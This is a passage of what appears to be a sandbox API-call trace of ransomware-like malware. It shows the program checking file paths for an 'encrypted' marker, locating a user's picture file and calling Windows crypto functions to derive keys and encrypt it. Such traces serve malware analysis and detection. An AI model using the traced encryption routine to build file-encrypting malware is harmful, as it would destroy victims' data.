dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.775] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.775] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.775] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.775] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.775] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.775] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.775] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.775] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x1e377b00, ftLastWriteTime.dwHighDateTime=0x1d5c2d6, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0x7c2100 [0039.776] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.776] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.776] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.776] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.776] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.777] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.777] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.777] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.777] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.778] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.778] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.779] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.779] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.779] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.779] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.779] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.779] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.779] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] CharLowerBuffW (in: lpsz="byte[256]", 